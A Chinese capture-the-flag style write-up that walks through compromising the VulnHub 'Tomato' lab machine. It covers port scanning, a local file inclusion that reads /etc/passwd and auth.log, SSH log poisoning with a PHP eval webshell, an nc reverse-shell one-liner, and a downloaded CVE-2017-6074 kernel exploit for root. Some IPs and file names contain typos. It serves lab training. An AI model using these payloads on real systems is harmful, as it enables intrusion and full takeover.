靶场通关 | Tomato靶机通关秘籍~

一、靶机部署

下载地址:

Tomato: 1 ~ VulnHub

打开VMware,在文件中选择打开:

输入靶机名称并选择存放地址:

等待导入:

编辑虚拟机设置:

配置自己给,网络模式我这里选择NAT,只要和kali在同一网段下即可:

注意:这里要配置好,不要多次更改,会导致后面实验崩溃。

开启虚拟机:

导入成功!!!

二、信息收集

1.探测靶机IP

扫描、发现主机

nmap -sA 192.168.168.0/24

对比MAC得到:靶机地址:192.168.168.131

2. 端口扫描

使用nmap对靶机进行详细的扫描:

nmap -A -T4 -p- 192.168.168.131 -A:使用所有高级扫描选项

-T4:设置时许,越高扫描越快

-p-:全端口扫描

3. 敏感目录扫描

dirb http://192.168.168.131

注:-w提示目录可以列出

再次扫描目录:

gobuster dir -u http://192.168.168.131 -w /usr/share/dirb/wordlists/common.txt -t 30

再次详细扫描目录:

dirb http://192.168.168.131 /usr/share/dirb/wordlists/common.txt

4. 信息收集总结

IP:192.168.168.131
开放端口:21、80、2211、8888
敏感目录:http://192.168.168.131/antibot_image/

三、渗透过程

1. 漏洞发现

登录网站:

http://192.168.168.131

发现一个大大的、红红的西红柿,买个西红柿,继续进行漏洞探测!!!
访问敏感目录:

http://192.168.168.131/antibot_image/

发现一堆东西,但不知道干嘛的!!!
经过一番搜寻,在

http://192.168.11.146/antibot_image/antibots/info.php

页面,查看源代码发现东西。

允许远程读取URL文件,但是不允许包含URL文件,可以进行利用。

查源码,提示可以传参,存在文件包含漏洞。

2. 文件包含漏洞利用

通过分析,该页面的源码中存在include,文件包含漏洞,我们尝试用该漏洞查看passwd文件,发现可以成功

http://192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

既然可以查看密码文件,那我们尝试查看一下其他文件。
查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索。

http://192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

发现该文件还记录了ssh登录的登录日志,无论登录成功与否都有记录,那么我们是否也可以使用这个机制写入一句一句话木马。

3. 反弹shell

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.168.131 -p 2211

写入之后我们使用蚁剑进行连接:

URL地址:http://192.168.192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log

密码:sss

连接成功后打开终端:

4. 生成可交互式shell

python3 -c"import pty;pty.spawn( '/bin/bash')"

反弹shell

192.168.168.128是kali的

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.168.128 9999 >/tmp/f

四、提权

1.查看系统信息

uname -a

whoami

2.使用CVE-2017-6074进行提权

下载提权脚本,执行,编译,并开启apache2服务

使用CVE-2017-6074的poc

git clone https://github.com/kkamagui/linux-kernel-exploits.git

cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074

./compile.sh

3.执行exp

使靶机访问攻击机的网站,下载exp,授予权限,并执行

cd /tmp

wget http://192.168.232.129/CVE-2017-6074

chmod +x CVE-217-6074/CVE-2017-6074

4.查看flag

cd /root

ls

cat proof.txt

 成功!!!

参考文档:

VulnHub-Tomato靶机详细渗透过程_小秋LY的博客-CSDN博客

VulnHub-Tomato_51CTO博客_tomato tomato

(谢谢大家!欢迎提出批评和建议!你的支持是我持续更新的巨大动力!)

  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值